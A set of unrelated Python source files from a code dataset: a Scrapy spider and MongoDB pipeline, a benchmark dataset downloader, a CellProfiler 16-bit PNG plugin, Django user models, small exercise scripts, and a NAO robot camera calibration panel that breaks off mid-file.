sel.xpath('.//a/@href').extract_first()\n country = sel.xpath('.//a/text()').extract_first()\n\n yield scrapy.Request(response.urljoin(link),callback=self.getstates,meta={\n 'country':country\n })\n\n def getstates(self,response):\n links = response.xpath('.//*[@class=\"regions-list\"]/li/a/@href').extract()\n for link in links:\n yield scrapy.Request(response.urljoin(link),callback=self.getstations,meta={\n 'country':response.meta.get('country')\n })\n\n def getstations(self,response):\n stations = response.xpath('.//*[@class=\"stations__station__title\"]/a/@href').extract()\n for station in stations:\n yield scrapy.Request(response.urljoin(station),callback=self.getdatas,meta={\n 'country':response.meta.get('country')\n })\n\n def getdatas(self,response):\n title = response.xpath('.//*[@class=\"station__title\"]/text()').extract_first()\n location = response.xpath('.//*[@itemprop=\"additionalProperty\"]/text()').extract_first()\n try:\n tags = ', '.join(response.xpath('.//*[@class=\"station__tags\"]/li/a/text()').extract())\n except:\n tags = ''\n description = response.xpath('.//*[@itemprop=\"description\"]/text()').extract_first()\n website = response.xpath('.//*[@itemprop=\"url\"]/@href').extract_first()\n facebook = response.xpath('.//*[@title=\"Facebook\"]/@href').extract_first()\n twitter = response.xpath('.//*[@title=\"Twitter\"]/@href').extract_first()\n wikipedia = response.xpath('.//*[@title=\"Wikipedia\"]/@href').extract_first()\n\n if 'onlineradiobox.csv' not in os.listdir(os.getcwd()):\n with open(\"onlineradiobox.csv\",\"a\") as f:\n writer = csv.writer(f)\n writer.writerow(['country','title','location','tags','description','website','facebook','twitter','wikipedia'])\n\n\n with open(\"onlineradiobox.csv\",\"a\") as f:\n writer = csv.writer(f)\n writer.writerow([response.meta.get('country'),title,location,tags,description,website,facebook,twitter,wikipedia])\n print([response.meta.get('country'),title,location,tags,description,website,facebook,twitter,wikipedia])\n\n","sub_path":"radiosync/spiders/onlineradiobox.py","file_name":"onlineradiobox.py","file_ext":"py","file_size_in_byte":2975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"454297982","text":"class Student:\n def __init__(self, name, school):\n self.name = name\n self.school = school\n self.marks = []\n\n @classmethod\n def friend(cls, origin, friend_name, salary):\n return cls(friend_name, origin.school, salary)\n\n\"\"\"\nanna = Student(\"Anna\", \"Oxford\")\nfriend = anna.friend(\"Greg\")\nprint(friend.name)\n\"\"\"\n\nclass WorkingStudent(Student):\n def __init__(self, name, school, salary):\n super().__init__(name, school)\n self.salary = salary\n\nanna = WorkingStudent(\"Anna\", \"Oxford\", 6000)\nprint(anna.salary)\n\nfriend = WorkingStudent.friend(anna, \"Greg\", 1000)\nprint(friend.name)\nprint(friend.salary)\n","sub_path":"Python Basics/inheritance.py","file_name":"inheritance.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"601100532","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\n\nimport os\nimport sys\nimport shutil\nimport hashlib\nimport platform\n\nimport numpy as np\nimport pandas as pd\nfrom .base import PipelineFinder\n\n\ndef load_dataset(name='treclegal09_2k_subset', cache_dir='/tmp',\n force=False, verbose=True,\n return_file_path=False,\n load_ground_truth=False, verify_checksum=False):\n \"\"\" Download a benchmark dataset.\n\n The currently supported datasets are listed below,\n\n 1. TREC 2009 legal collection\n\n - treclegal09_2k_subset : 2 400 documents, 2 MB\n - treclegal09_20k_subset : 20 000 documents, 30 MB\n - treclegal09_37k_subset : 37 000 documents, 55 MB\n - treclegal09 : 700 000 documents, 1.2 GB\n\n The ground truth files for categorization are adapted from TAR Toolkit.\n\n 2. Fedora mailing list (2009-2009)\n - fedora_ml_\n\n If you encounter any issues for downloads with this function,\n you can also manually download and extract the required dataset to `cache_dir` (the\n download url is `http://r0h.eu/d/.tar.gz`), then re-run this function to get\n the required metadata.\n\n Parameters\n ----------\n name : str, default='treclegal09_2k_subset'\n the name of the dataset file to load\n cache_dir : str, default='/tmp/'\n root directory where to save the download\n force : bool, default=False\n download again if the dataset already exists.\n Warning: this will remove previously downloaded files!\n return_file_path : bool, default=False\n also return a list of all filenames\n load_ground_truth : bool, default=False\n parse the ground truth files present in the dataset\n verbose : bool, default=False\n print download progress\n verify_checksum : bool, default=False\n verify the checksum of the downloaded archive\n\n Returns\n -------\n\n response: dict\n a dictionary containing paths to the dataset and corresponding metadata\n \"\"\"\n import tarfile\n import requests\n from .ingestion import DocumentIndex\n from .io import parse_ground_truth_file\n\n VALID_MD5SUM = {'treclegal09_2k_subset' : '8090cc55ac18fe5c4d5d53d82fc767a2',\n 'treclegal09_20k_subset': '43a711897ce724e873bdbc47a374a57e',\n 'treclegal09_37k_subset': '9fb6b7505871bbaee5a438de3b0f497c',\n 'legal09int': 'None',\n 'fedora_ml_3k_subset': '09dbb03d13b8e341bd615ce43f2d836b'\n }\n\n DATASET_SIZE = {'treclegal09_2k_subset' : 2.8,\n 'treclegal09_20k_subset': 30,\n 'treclegal09_37k_subset': 55,\n 'legal09int': 1500,\n 'fedora_ml_3k_subset': 3,\n }\n\n if name not in VALID_MD5SUM:\n raise ValueError('Dataset name {} not known!'.format(name))\n\n\n base_url = \"http://r0h.eu/d/{}.tar.gz\".format(name)\n\n # make sure we don't have \"ediscovery_cache\" in the path\n cache_dir = PipelineFinder._normalize_cachedir(cache_dir)\n cache_dir = os.path.dirname(cache_dir)\n \n\n outdir = os.path.join(cache_dir, name)\n fname = outdir + \".tar.gz\"\n\n if os.path.exists(outdir) and force:\n shutil.rmtree(outdir)\n\n # Download the the dataset if it doesn't exist\n if not os.path.exists(outdir):\n\n if verbose:\n print('\\nWarning: downloading dataset {} ({} MB) !'.format(name,\n DATASET_SIZE[name]))\n response = requests.get(base_url, stream=False, allow_redirects=True)\n with open(fname, \"wb\") as fh:\n for idx, chunk in enumerate(response.iter_content(chunk_size=1024)):\n if chunk:\n fh.write(chunk)\n if verbose:\n print('\\nFile {} downloaded!'.format(fname))\n\n if verify_checksum:\n # compute the md5 hash by chunks\n with open(fname, 'rb') as fh:\n block_size=2**20\n md5 = hashlib.md5()\n while True:\n data = fh.read(block_size)\n if not data:\n break\n md5.update(data)\n hash_val = md5.hexdigest()\n if hash_val != VALID_MD5SUM[name]:\n raise IOError('Checksum failed for the dataset, this may be due'\n 'to a corrupted download. Try running this function'\n 'again with the `force=True` option.')\n\n # extract the .tar.gz\n with tarfile.open(fname, \"r:gz\") as tar:\n tar.extractall(path=cache_dir)\n if verbose:\n print('Archive extracted!'.format(fname))\n\n\n\n results = {'base_dir': outdir, 'data_dir': os.path.join(outdir, 'data')}\n if name == 'legal09int':\n results['data_dir'] = results['base_dir']\n di = DocumentIndex.from_folder(results['data_dir'])\n results['document_id'] = [idx for idx, _ in enumerate(di.filenames)]\n if return_file_path:\n results['file_path'] = di.filenames\n\n\n\n if load_ground_truth and 'treclegal09' in name:\n with open(os.path.join(outdir,'seed_relevant.txt'), 'rt') as fh:\n relevant_files = [el.strip() for el in fh.readlines()]\n\n with open(os.path.join(outdir,'seed_non_relevant.txt'), 'rt') as fh:\n non_relevant_files = [el.strip() for el in fh.readlines()]\n\n\n if platform.system() == 'Windows':\n relevant_files = [el.replace('/', '\\\\') for el in relevant_files]\n non_relevant_files = [el.replace('/', '\\\\') for el in non_relevant_files]\n\n results['seed_file_path'] = relevant_files + non_relevant_files \n res = di.search(pd.DataFrame({'file_path': relevant_files + non_relevant_files}))\n results['seed_document_id'] = res.internal_id.values.tolist() # document_id & internal_id are the same\n results['seed_y'] = list(np.concatenate((np.ones(len(relevant_files)),\n np.zeros(len(non_relevant_files)))).astype('int'))\n\n ground_truth_file = os.path.join(outdir, \"ground_truth_file.txt\") \n gt = parse_ground_truth_file(ground_truth_file)\n\n res = di.search(gt, drop=False)\n results['ground_truth_y'] = res.is_relevant.values.tolist()\n\n return results\n\n\n\n\n\n","sub_path":"freediscovery/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":6505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"26442561","text":"# coding=utf-8\n\n#################################\n#\n# Imports from useful Python libraries\n#\n#################################\n\nimport numpy\nimport scipy.ndimage\nimport imageio\n\n#################################\n#\n# Imports from CellProfiler\n#\n##################################\n\nimport cellprofiler.image\nimport cellprofiler.module\nimport cellprofiler.setting\n\n__doc__ = \"\"\"\\\nSave16BitPngs\n=============\n**Save16BitPngs** is a hacky module that can save 16 bit images in .png format, something that is not supported in CellProfiler 3.1.5.\nDo not run this module for any other save operation.\n|\n============ ============ ===============\nSupports 2D? Supports 3D? Respects masks?\n============ ============ ===============\nYES NO NO\n============ ============ ===============\nSee also\n^^^^^^^^\n\nWhat do I need as input?\n^^^^^^^^^^^^^^^^^^^^^^^^\nA .tiff flourescent image\nWhat do I get as output?\n^^^^^^^^^^^^^^^^^^^^^^^^\n\nTechnical notes\n^^^^^^^^^^^^^^^\nExporting 16bit png images can be relevant for certain convolutional neural network designs\n\nReferences\n^^^^^^^^^^\nNiklas Rindtorff\n\"\"\"\n\n#\n# Constants\n#\n# It's good programming practice to replace things like strings with\n# constants if they will appear more than once in your program. That way,\n# if someone wants to change the text, that text will change everywhere.\n# Also, you can't misspell it by accident.\n#\n#GRADIENT_MAGNITUDE = \"Gradient magnitude\"\n#\n# The module class.\n#\n# Your module should \"inherit\" from cellprofiler.module.Module, or a\n# subclass of cellprofiler.module.Module. This module inherits from\n# cellprofiler.module.ImageProcessing, which is the base class for\n# image processing modules. Image processing modules take an image as\n# input and output an image.\n#\n# This module will use the methods from cellprofiler.module.ImageProcessing\n# unless you re-implement them. You can let cellprofiler.module.ImageProcessing\n# do most of the work and implement only what you need.\n#\n# Other classes you can inherit from are:\n#\n# - cellprofiler.module.ImageSegmentation: modules which take an image\n# as input and output a segmentation (objects) should inherit from this\n# class.\n# - cellprofiler.module.ObjectProcessing: modules which operate on objects\n# should inherit from this class. These are modules that take objects as\n# input and output new objects.\n#\nclass Save16BitPngs(cellprofiler.module.ImageProcessing):\n #\n # The module starts by declaring the name that's used for display,\n # the category under which it is stored and the variable revision\n # number which can be used to provide backwards compatibility if\n # you add user-interface functionality later.\n #\n # This module's category is \"Image Processing\" which is defined\n # by its superclass.\n #\n module_name = \"Save16BitPngs\"\n\n variable_revision_number = 1\n\n #\n # \"create_settings\" is where you declare the user interface elements\n # (the \"settings\") which the user will use to customize your module.\n #\n # You can look at other modules and in cellprofiler.settings for\n # settings you can use.\n #\n def create_settings(self):\n #\n # The superclass (cellprofiler.module.ImageProcessing) defines two\n # settings for image input and output:\n #\n # - x_name: an ImageNameSubscriber which \"subscribes\" to all\n # ImageNameProviders in prior modules. Modules before yours will\n # put images into CellProfiler. The ImageNameSubscriber gives\n # your user a list of these images which can then be used as inputs\n # in your module.\n # - y_name: an ImageNameProvider makes the image available to subsequent\n # modules.\n super(Save16BitPngs, self).create_settings()\n\n #\n # reST help that gets displayed when the user presses the\n # help button to the right of the edit box.\n #\n # The superclass defines some generic help test. You can add\n # module-specific help text by modifying the setting's \"doc\"\n # string.\n #\n self.x_name.doc = \"\"\"\\\nThis is the image that the module operates on. You can choose any image\nthat is made available by a prior module.\n**Save16BitPngs** will do something to this image.\n\"\"\"\n # We use a float setting so that the user can give us a number\n # for the scale. The control will turn red if the user types in\n # an invalid scale.\n #\n self.single_file_name = cellprofiler.setting.Text(\n \"Enter single file name\",\n \"OrigBlue\",\n metadata=True,\n doc=\"\"\"\\\nThis sets the image file name - You should use metadata information to fill this name, otherwise the pipeline will simply overwrite images!.\n\"\"\"\n )\n\n #\n # The \"settings\" method tells CellProfiler about the settings you\n # have in your module. CellProfiler uses the list for saving\n # and restoring values for your module when it saves or loads a\n # pipeline file.\n #\n def settings(self):\n #\n # The superclass's \"settings\" method returns [self.x_name, self.y_name],\n # which are the input and output image settings.\n #\n settings = super(Save16BitPngs, self).settings()\n\n # Append additional settings here.\n return settings + [\n self.single_file_name\n ]\n\n #\n # \"visible_settings\" tells CellProfiler which settings should be\n # displayed and in what order.\n #\n # You don't have to implement \"visible_settings\" - if you delete\n # visible_settings, CellProfiler will use \"settings\" to pick settings\n # for display.\n #\n def visible_settings(self):\n #\n # The superclass's \"visible_settings\" method returns [self.x_name,\n # self.y_name], which are the input and output image settings.\n #\n visible_settings = super(Save16BitPngs, self).visible_settings()\n\n # Configure the visibility of additional settings below.\n visible_settings += [\n self.single_file_name\n ]\n\n return visible_settings\n\n #\n # CellProfiler calls \"run\" on each image set in your pipeline.\n #\n def run(self, workspace):\n #\n # The superclass's \"run\" method handles retreiving the input image\n # and saving the output image. Module-specific behavior is defined\n # by setting \"self.function\", defined in this module. \"self.function\"\n # is called after retrieving the input image and before saving\n # the output image.\n #\n # The first argument of \"self.function\" is always the input image\n # data (as a numpy array). The remaining arguments are the values of\n # the module settings as they are returned from \"settings\" (excluding\n # \"self.y_data\", or the output image).\n #\n self.function = save16bitpng\n\n super(Save16BitPngs, self).run(workspace)\n\n #\n # \"volumetric\" indicates whether or not this module supports 3D images.\n # The \"gradient_image\" function is inherently 2D, and we've noted this\n # in the documentation for the module. Explicitly return False here\n # to indicate that 3D images are not supported.\n #\n def volumetric(self):\n return False\n\n#\n# This is the function that gets called during \"run\" to create the output image.\n# The first parameter must be the input image data. The remaining parameters are\n# the additional settings defined in \"settings\", in the order they are returned.\n#\n# This function must return the output image data (as a numpy array).\n#\ndef save16bitpng(pixels, single_file_name):\n #Converting percentile\n mat_ms = pixels*65535\n mat_ms = mat_ms.astype(numpy.uint16)\n #I store\n imageio.imwrite(uri = single_file_name, im = mat_ms)\n #return pixels\n","sub_path":"unmaintained_plugins/CellProfiler3/save_16bit_pngs.py","file_name":"save_16bit_pngs.py","file_ext":"py","file_size_in_byte":7822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"210216848","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport pymongo\nfrom scrapy.exceptions import DropItem\n\nclass MyscrapyPipeline(object):\n def __init__(self):\n connection = pymongo.MongoClient(host='127.0.0.1',port=27017)\n db = connection.DoubanMovie\n self.collect = db.MovieTop250\n\n def process_item(self, item, spider):\n valid = True\n for data in item:\n if not data:\n valid = False\n raise DropItem(\"Missing %s of blogpost from %s\" %(data, item['url']))\n if valid:\n new_moive=[{\n \"title\":item['title']\n }]\n self.collect.insert(new_moive)\n return item\n","sub_path":"myscrapy/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"7367435","text":"import sys\r\n\r\ndef NOD(x, y):\r\n if x%y == 0:\r\n print(\"Greatest Common Divisor: \"+str(y))\r\n else:\r\n NOD(y,x%y)\r\n\r\ndef NOK(x, y):\r\n gcd=(x*y)/NOD(x, y)\r\n print(\"Smallest Common Multiple: \"+str(gcd))\r\n \r\nwhile True:\r\n print(\"Enter numbers as A B. Enter Ex to exit\")\r\n a=input(\"enter first number: \")\r\n b=input(\"enter second number: \")\r\n \r\n if str(a) or str(b) == \"Ex\":\r\n break\r\n if type(a) != int and type(b) != int:\r\n print(\"Error! Number must be integer! Try again\")\r\n if a > b:\r\n greater = a\r\n smaller = b\r\n else:\r\n greater = b\r\n smaller = a\r\n NOD(greater, smaller)\r\n NOK(greater, smaller)\r\n \r\n \r\n \r\n \r\n \r\n","sub_path":"gcd.py","file_name":"gcd.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"400227802","text":"from django.db import models\nfrom django.contrib.auth.models import AbstractBaseUser, BaseUserManager\nfrom django.contrib.auth.models import PermissionsMixin\nfrom django.utils.translation import ugettext_lazy as _\nfrom .managers import UserManager, StudentManager\n\n# Create your models here.\nclass User(AbstractBaseUser, PermissionsMixin):\n email = models.EmailField(_(\"email address\"), unique=True)\n first_name = models.CharField(_(\"first_name\"), max_length=40, blank=True)\n last_name = models.CharField(_(\"last name\"), max_length=40, blank=True)\n address = models.CharField(_(\"address\"), max_length=255, blank=True)\n mobile = models.CharField(_(\"mobile\"), max_length=13, blank=True)\n # date_joined = models.DateTimeField(_('date joined'), auto_now_add = True)\n is_active = models.BooleanField(_(\"active\"), default=True)\n is_staff = models.BooleanField(_(\"staff status\"), default=False)\n is_superuser = models.BooleanField(_(\"is superuser\"), default=False)\n is_admin = models.BooleanField(_(\"is admin\"), default=False)\n is_student = models.BooleanField(_(\"is student\"), default=False)\n is_teacher = models.BooleanField(_(\"is teacher\"), default=False)\n\n objects = UserManager()\n\n USERNAME_FIELD = \"email\"\n REQUIRED_FIELDS = [\"first_name\", \"last_name\"]\n\n class Meta:\n verbose_name = _(\"user\")\n verbose_name_plural = _(\"users\")\n\n def get_short_name(self):\n return self.first_name\n\n def get_full_name(self):\n return self.first_name + \"_\" + self.last_name\n\n def save(self, *args, **kwargs):\n\n self.username = self.email\n super(User, self).save(*args, **kwargs)\n\n def __str__(self):\n\n return self.email\n\n\nclass Student(User):\n user = models.OneToOneField(User, on_delete=models.CASCADE, parent_link=True)\n user.is_student = True\n user.is_teacher = False\n department = models.CharField(max_length=40)\n sap_id = models.CharField(max_length=12, default=0, blank=True)\n graduation_year = models.CharField(max_length=4, blank=True)\n objects = StudentManager()\n\n USERNAME_FIELD = \"email\"\n REQUIRED_FIELDS = []\n\n def __str__(self):\n return self.user.email\n","sub_path":"libraryBackend/libraryApp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"195624381","text":"import torch\nimport pandas as pd\nfrom transformers import XLMTokenizer, XLMWithLMHeadModel\n\ntokenizer = XLMTokenizer.from_pretrained(\"xlm-mlm-ende-1024\")\n\nclass load_data():\n\tdef __init__(self, paths = ['./data/train.en','./data/train.de'], pll_size = 10**5):\n\t\tself.src_lang_path = paths[0]\n\t\tself.trgt_lang_path = paths[1]\n\t\tself.pll_size = pll_size\n\n\tdef load(self):\n\t\ti = 0\n\t\tself.src_tokens = []\n\t\tself.trgt_tokens = []\n\t\twith open(self.src_lang_path, 'rt') as f:\n\t\t while(i!=self.pll_size):\n\t\t input_ids = torch.tensor(tokenizer.encode(f.readline()))\n\t\t self.src_tokens.append(input_ids)\n\t\t i = i + 1\n\n\t\twith open(self.trgt_lang_path, 'rt') as f:\n\t\t while(i!=2*self.pll_size):\n\t\t input_ids = torch.tensor(tokenizer.encode(f.readline()))\n\t\t self.de_tokens.append(input_ids) \n\t\t i = i + 1\n\n\tdef final_data(self):\n\t\tzipped_list = list(zip(self.src_tokens, self.trgt_tokens))\n\t\tdf_prllel = pd.DataFrame(zipped_list, columns = ['en', 'de'], dtype=object)\n\t\tdf_eng = pd.DataFrame(self.src_tokens)\n\t\tdf_de = pd.DataFrame(self.trgt_tokens)\n\n\t\treturn df_prllel, df_eng, df_de","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"514827781","text":"\"\"\" Google interview problems \"\"\"\n\n\"\"\"\nYou have k lists of sorted integers. Find the smallest range that\nincludes at least one number from each of the k lists.\n\nFor example,\nList 1: [4, 10, 15, 24, 26]\nList 2: [0, 9, 12, 20]\nList 3: [5, 18, 22, 30]\n\nThe smallest range here would be [20, 24] as it contains 24 from list\n1, 20 from list 2, and 22 from list 3.\n\n\"\"\"\n\ndef min_range(l):\n n = len(l)\n idx = [0 for i in range(n)]\n \n stop = False\n while not stop:\n k = [ (i, l[i][idx[i]]) for i in range(n)]\n k.sort(key = lambda x: x[1])\n (j, val) = k[0]\n if idx[j] == len(l[j]) -1 :\n stop = True\n else:\n idx[j] = idx[j] + 1\n result = [l[i][idx[i]] for i in range(n)]\n return result\n \n\n\"\"\" Give you an array which has n integers,it has both positive and\nnegative integers.Now you need sort this array in a special way.After\nthat,the negative integers should in the front,and the positive\nintegers should in the back.Also the relative position should not be\nchanged. eg. -1 1 3 -2 2 ans: -1 -2 1 3 2. \"\"\"\n\ndef stable_partition(l):\n pos = [x for x in l if x >0]\n neg = [y for y in l if y < 0]\n return (pos, neg)\n\n\"\"\" Given an array of integers. Find two disjoint contiguous sub-\narrays such that the absolute difference between the sum of two sub-\narray is maximum. * The sub-arrays should not overlap.\n\neg- [2 -1 -2 1 -4 2 8] ans - (-1 -2 1 -4) (2 8), diff = 16 \n\"\"\"\ndef max_diff(l):\n def find_max_or_min(l, find_max):\n m = 0\n ex = l[0]\n for i in range(1,len(l)):\n if find_max:\n if l[i] > ex:\n m = i\n ex = l[i]\n else:\n if l[i] < ex:\n m = i\n ex = l[i]\n return m \n # Cumulative sum\n def csum(l):\n cumsum = []\n s = 0\n for i in l:\n s += i\n cumsum.append(s)\n return cumsum\n def find_two_extremes(cumsum):\n max_i = find_max_or_min(cumsum, True)\n min_i = find_max_or_min(cumsum, False)\n return sorted((min_i, max_i))\n\n # Main routine goes here\n cs = csum(l)\n (i, j) = find_two_extremes(cs)\n if j == len(l) -1:\n (i2, j2) = find_two_extremes(cs[:i+1])\n return (i2, i)\n elif i == 0:\n (i2, j2) = find_two_extremes(cs[j:])\n return (j, j + j2)\n else:\n return (i, j)\n","sub_path":"google.py","file_name":"google.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"425792766","text":"from mate.debug.colorlog import ColorLog\nfrom mate.lib.calibration.nao_calib_captures import *\nfrom mate.lib.calibration.calib_motion_generator import CalibMotionGenerator\nfrom mate.lib.calibration.calibration import BoardProperties as BoardProps, Transforms\nimport copy\nimport uuid\nimport json\nimport os\nimport time\nimport typing\nfrom typing import Union\nfrom datetime import datetime\nfrom enum import Enum, IntEnum\n\nimport math\nimport numpy as np\n\nfrom transforms3d import axangles as axangles, affines as affines\n\nimport PyQt5.QtGui as qtg\nimport PyQt5.QtCore as qtc\nimport PyQt5.QtWidgets as qtw\n\nimport mate.ui.utils as ui_utils\nfrom mate.ui.panels._panel import _Panel\n\nimport mate.net.nao as nao\nimport mate.net.nao_data as nd\nimport mate.net.utils as netutils\n\nfrom mate.lib.calibration.nao_cam_props import NaoCamProps as n_cam\nfrom mate.lib.calibration.nao_calib_captures import\\\n NaoCaptureData as n_cap,\\\n NaoKinematicMatrixCapture as n_kinCap,\\\n ImageWithKinematicData\nfrom mate.lib.calibration.nao_calibration import\\\n NaoCalibSettings,\\\n NaoCalibration as NaoCalib,\\\n NaoCalibrationResult as n_result\n\n\nlogger = ColorLog()\n\n\nclass Main(_Panel):\n name = \"CameraCalib\"\n\n CAM_MOUNT = {\n n_cam.TOP: \"Brain.CameraCalibration.top_image\",\n n_cam.BOTTOM: \"Brain.CameraCalibration.bottom_image\"\n }\n\n KIN_MATRIX_MOUNT = \"Brain.CameraCalibration.MatrixAndImageInfos\"\n\n CALIB_VISION_CFG = {\"mount\": \"Brain.CameraCalibration\",\n \"trigger_key\": \"calibrationCaptureTrigger\"}\n CALIB_BEHAVIOR_CFG = {\n \"mount\": \"Brain.BehaviorModule\",\n \"head_pitch_key\": \"calibrationHeadPitch\",\n \"head_yaw_key\": \"calibrationHeadYaw\",\n \"is_cam_calib\": \"isCameraCalibration\"\n }\n\n update_config_signal = qtc.pyqtSignal(nd.ConfigMount)\n\n def __init__(self, main_window, nao: nao.Nao, model: typing.Dict = None):\n super(Main, self).__init__(main_window, self.name, nao)\n ui_utils.loadUi(__file__, self)\n self.model = model\n self.currentSubscriptions = set()\n self.configWidget.hide()\n self.resultWidget.hide()\n self.btnCapture.clicked.connect(self.capture)\n self.btnCalibrate.clicked.connect(self.startCalib)\n self.btnSave.clicked.connect(self.saveCalib)\n self.btnExport.clicked.connect(self.exportCalibToFile)\n self.btnShowResults.clicked.connect(\n lambda: self.resultWidget.setVisible(not self.resultWidget.isVisible()))\n self.btnConfAndManualMode.clicked.connect(\n lambda: self.configWidget.setVisible(not self.configWidget.isVisible()))\n self.checkBoxCalibModeEnable.stateChanged.connect(\n lambda: self.setCalib(self.checkBoxCalibModeEnable.isChecked()))\n self.btnManualMove.clicked.connect(lambda: self.moveRobot(\n float(self.txtPitch.text().strip()), float(self.txtYaw.text().strip())))\n\n # As capturing automatically project, no need to specifically call project\n self.btnProjectMarkers.clicked.connect(self.capture)\n\n self.btnPlayMotionSeq.clicked.connect(\n lambda: self.setMotionSequenceState(1))\n self.btnStopMotion.clicked.connect(\n lambda: self.setMotionSequenceState(0))\n\n self.btnDownload.clicked.connect(\n self.saveCapturesToFile)\n\n #### Set UI update ####\n self.frame_rate = 20\n self.updateInterval = 1.0/float(self.frame_rate)\n\n self.timer = qtc.QTimer()\n self.timer.timeout.connect(self.update)\n self.set_timer(self.frame_rate)\n\n # Motion command things.\n\n # The UI update timer itself will be used for timing the capture stuff.\n # motion command sending; values in seconds\n self.motionDelay = 2.0\n # wait n seconds after motion command is sent before triggering\n self.captureDelay = 2.3\n self.motionCommandList = CalibMotionGenerator.generateHeadMotion()\n self.motionSeqIndex = 0\n self.motionSeqState = 0\n self.elapsedTime = 0\n\n self.trigger_state = {n_cam.TOP: False, n_cam.BOTTOM: False}\n\n #### capture ####\n self.captureFlag = False\n # self.captureInfo = CalgetGroundToCamera\n\n #### store data of each capture. ####\n self.captures = []\n\n #### img data ####\n self.cur_cam_img_data = {\n n_cam.TOP:\n ImageWithKinematicData(n_cam.TOP,\n Main.CAM_MOUNT[n_cam.TOP], 0, 0, [], False),\n n_cam.BOTTOM: ImageWithKinematicData(n_cam.BOTTOM,\n Main.CAM_MOUNT[n_cam.BOTTOM], 0, 0, [], False)\n }\n\n self.cur_matrix_cap = {\n n_cam.TOP: n_kinCap(n_cam.TOP),\n n_cam.BOTTOM: n_kinCap(n_cam.BOTTOM)\n }\n\n # rotation pose for the RC17 rig (using charuco): [math.pi/2,0,-math.pi/2]\n # translation for the RC17 rig: 395 in x;\n self.calib_board = BoardProps(35, 50, 6, 11, BoardProps.PatternType.CHARUCO_BOARD, [\n math.pi/2, 0, -math.pi/2], [400, 150, 15])\n self.calibrator = NaoCalib(NaoCalibSettings(\n [self.calib_board], self.checkBoxIntrinsicTop.isChecked(), self.checkBoxIntrinsicBottom.isChecked(\n ), self.checkBoxExtrinsicTop.isChecked(), self.checkBoxExtrinsicBottom.isChecked()))\n\n self.btnClearCaptures.clicked.connect(\n self.clearCaptureBtnHandler)\n self.results = None\n self.enableDisableCalibButton()\n #### connect update config signal ####\n self.currentConfig = None\n self.update_config_signal.connect(self.updateConfig)\n\n #### connect ####\n if self.nao.is_connected():\n self.connect(self.nao, self.frame_rate)\n\n def clearCaptureBtnHandler(self):\n self.calibrator.clearCapturedData()\n self.enableDisableCalibButton()\n self.updateStatusLabel(\"Captures cleared\")\n\n def enableDisableCalibButton(self):\n c = self.calibrator.captureCount()\n b = c[NaoCamProps.TOP] or c[NaoCamProps.BOTTOM]\n self.btnCalibrate.setEnabled(b)\n self.btnClearCaptures.setEnabled(b)\n self.btnDownload.setEnabled(b)\n\n def updateConfig(self, data: nd.ConfigMount):\n if data.key == n_result.MOUNT:\n self.currentConfig = copy.deepcopy(data.data)\n self.calibrator.updateConfiguration(self.currentConfig)\n logger.info(__name__ + \"Updated config\")\n\n #### Subscriptions, connections, etc ####\n def connect(self, nao: nao.Nao, frame_rate: int = 30):\n self.nao = nao\n self.set_timer(frame_rate)\n\n #### subscribe ####\n self.subscribeMulti(Main.CAM_MOUNT.values())\n self.subscribe(Main.KIN_MATRIX_MOUNT)\n self.subscribeConfig(n_result.MOUNT)\n\n self.trigger(n_cam.CamSelect.NONE)\n\n def set_timer(self, frameRate: int):\n self.timer.stop()\n if frameRate > 0 and self.nao.is_connected():\n self.updateInterval = 1.0/self.frame_rate\n self.timer.start(1000 * self.updateInterval)\n\n def subscribe(self, key):\n if self.nao.is_connected() and key not in self.currentSubscriptions:\n self.nao.debug_protocol.subscribe(key, self.identifier,\n lambda d: self.data_received(d))\n self.currentSubscriptions.add(key)\n\n def unsubscribe(self, key: str = \"*\"):\n self.unsubscribeMulti(key)\n\n def unsubscribeMulti(self, keys: Union[str, list, set]):\n '''\n Unsubscribe from multiple mounts\n sending wildcard \"*\" instead of a list will cause unsubscription from all\n '''\n if self.nao.is_connected():\n if isinstance(keys, str) and keys == \"*\":\n for curSubKey in self.currentSubscriptions:\n self.nao.debug_protocol.unsubscribe(curSubKey,\n self.identifier)\n else:\n # Only attempt to unsub. already subscribed keys\n keys = set(keys)\n keys.intersection_update(self.currentSubscriptions)\n for curSubKey in keys:\n self.nao.debug_protocol.unsubscribe(curSubKey,\n self.identifier)\n\n def subscribeMulti(self, keys):\n '''\n Subscribe for multiple mounts\n '''\n keys = set(keys)\n if self.nao.is_connected():\n for key in keys:\n self.nao.debug_protocol.subscribe(key, self.identifier,\n lambda d: self.data_received(d))\n self.currentSubscriptions.update(keys)\n\n def drawMarkers(self, pixmap, dataList, colour: qtg.QColor = qtc.Qt.red):\n if not (dataList and len(dataList[0]) == 2):\n if dataList[0]:\n logger.error(__name__ + \": drawMarkers-> Data list is not in correct shape;\" +\n str(len(dataList), len(dataList[0])))\n return\n\n painter = qtg.QPainter()\n painter.begin(pixmap)\n painter.setPen(colour)\n\n rect = qtc.QRectF(0, 0, 4, 4)\n for dataSet in dataList:\n proj_pt = (dataSet[1][0], 